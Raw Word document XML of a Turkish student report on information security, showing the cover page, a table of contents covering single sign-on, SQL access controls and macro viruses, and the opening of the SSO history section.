          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21E3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://www.kaspersky.com.tr/resource-center/threats/malicious-tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C21E3C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21E3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Information Security  Management  HandBook</w:t>
      </w:r>
      <w:r w:rsidRPr="00C21E3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B370A5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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Pr="004068C4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004068C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Bircan SATI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004068C4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004068C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>130757020</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004068C4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004068C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Bilgisayar Bilgi Güvenliği ve Yönetimi </w:t>
      </w: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Pr="004068C4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004068C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Konu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Single Sign-On (SSO)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Section 1.3.3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004068C4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Konu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004068C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Relational Data Base Access Controls Using SQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Section 1.4.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004068C4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Konu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Makro Virüsler</w:t>
      </w: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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pP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Pr="00343E0C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>İçindekiler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00343E0C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.Single Sign-On (SSO)</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1.1 Tarihçe</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1.2 SSO Nedir ?</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1.3 SSO Senaryoları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00343E0C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SSO Uygulanmayan Login Senaryosu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00343E0C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Temel SSO Uygulanan Login Senaryosu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00343E0C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Merkez Domainli SSO Uygulaması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BB784B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1.3.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SSO Yaygın Kullanım</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00343E0C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00343E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Token Nedir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00343E0C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2. Relational Data Base Access Controls Using SQL</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1 Primary Key</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2 SQL İfadeleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Create</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Insert ve Delete</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Update</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3 SQL İzinleri</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4 SQL İzin Bileşenleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>İlkeler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Sağlanabilirler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00343E0C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>İzinler</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5 İzinler</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6 Sunucu ve Veritabanı Rolleri</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2.7 SQL Server İzinleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00343E0C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3.Makro Virüsler</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3.1 Makro Virüs Nedir ?</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3.2 Makro Virüsler Nasıl Yayılır ?</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3.3 Riskler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00343E0C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3.4 Makro Virüs Türleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00343E0C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3.4.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Concept Virüsü </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00343E0C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Melissa Virüsü</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3.5 Makro Virüsleri Önleme</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00343E0C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>1.Single Sign-On (SSO)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>1.1 Tarihçe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BB784B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tüm şirketler fonksiyonel bir şekilde ana bilgisayar merkezli (Maninframe-Centered) veri işleme ortamlarını sunucu/istemci tabanlı konfigürasyonlar ile değiştirdi.</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Bu değişim sonucunda yeni ekonomiler, çok çeşitli operasyonel seçenekler ve bir dizi zorluklar meydana geldi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ana bilgisayar merkezli kurulumda sistem yönetimi genellikle bilgisayar sisteminin yönetimini yapanlar ile belirli bir alana sınırlıydı. Dağıtılmış işlemci/sunucu mimarisinde bu sistem komplike ve dağıtık bir yapıya dönüştü. En basit giriş yapma işlemi bile zor bir hale geldi.</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aşlangıçta yaklaşık 50 yıl önce sistem tasarımcıları kullanıcıların bilgisayar sistemleri ile etkileşimini izlemenin bir yolu olduğunu farketti. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BB784B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kullanıcılar tek bir alanda olduğu için her kullanıcıya bir kullanıcı adı ve şifre verilerek ve bu kullanıcı ile ilgili işlemlerin kayıtları tutularak güvelik sağlayabiliyorlardı. Basit anlaşılır ve yönetimi kolaydı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
